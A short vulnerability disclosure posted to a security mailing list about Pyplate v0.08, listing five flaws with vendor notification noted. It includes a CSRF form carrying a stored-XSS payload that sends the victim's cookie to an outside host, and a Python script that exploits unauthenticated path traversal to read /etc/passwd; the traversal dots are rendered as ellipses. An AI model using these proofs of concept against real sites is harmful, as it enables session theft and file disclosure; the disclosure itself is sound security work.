Hello list,
My friend Teemu V. "requested" security audit for Pyplate. While quickly
checking quality of this software I noticed following issues. This is not a full
security audit as I don't have much free time.
Tested version: v0.08 (still beta)
Vendor notification: 2014-05-13
Issue 1.
Installation instruction tells user to execute following commands without
checking any checksums or similar:
> wget http://pyplate.com/pyplate_install.sh
> chmod +x ./pyplate_install.sh
> sudo ./pyplate_install.sh
Issue 2.
File /usr/lib/cgi-bin/create_passwd_file.py creates passwd.db for admin user
password with world readable permissions. I like that salt :]
20 salt="bla"
21
22 hash=crypt.crypt(random_string,'$6$'+salt+'$')
23 usercredentials="admin:"+hash
24
25 passwdf=open("./passwd.db",'w')
26 passwdf.write(usercredentials)
27 passwdf.close()
-rw-r–r-- 1 www-data www-data 99 May 13 20:45 /usr/share/pyplate/passwd.db
Issue 3.
Application is not using HttpOnly (nor Secure) flag in cookie "id".
Issue 4.
CSRF + XSS with cookie stealing PoC:
<html>
<body>
<form action="http://example.com/admin/addScript.py" method="POST">
<input type="hidden" name="title" value="<script>new Image().src="http://bugs.fi/evil.py?cookie=" encodeURI(document.cookie);</script>" />
<input type="hidden" name="file" value="bugs" />
<input type="hidden" name="category" value="/" />
<input type="hidden" name="post" value="<p>bugs</p>
" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="new" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
There is no CSRF protection and most of admin functionality contain stored XSS
issues.
Issue 5.
File /usr/lib/cgi-bin/download.py is used to download backup file from
installation after admin has created it in web-ui. Note the comment.
21 # need to check that the filename doesn't contain slashes
26 path = pyplate.getCMSRoot() + "/backup/" + filename
27 file = open (path, 'rb')
Normally HTTP POST message looks like:
"""
POST /cgi-bin/download.py HTTP/1.1
Host: 10.0.0.53
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.53/admin/manage_backups.py
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
filename=backup_2014.05.13.223720.tar.gz
"""
Attacker can use this without authentication to download arbitrary files from
the system. File needs to be readable by web server process. PoC for /etc/passwd
below:
"""
#!/usr/bin/env python
import requests
payload = {'filename': '…/…/…/…/etc/passwd'}
r = requests.post('http://example.org/cgi-bin/download.py',
data=payload)
print r.text
"""
If author responds with fixed in version I can coordinate this and send email to
abuse@ address for all users (which is not that many currently).
Henri Salo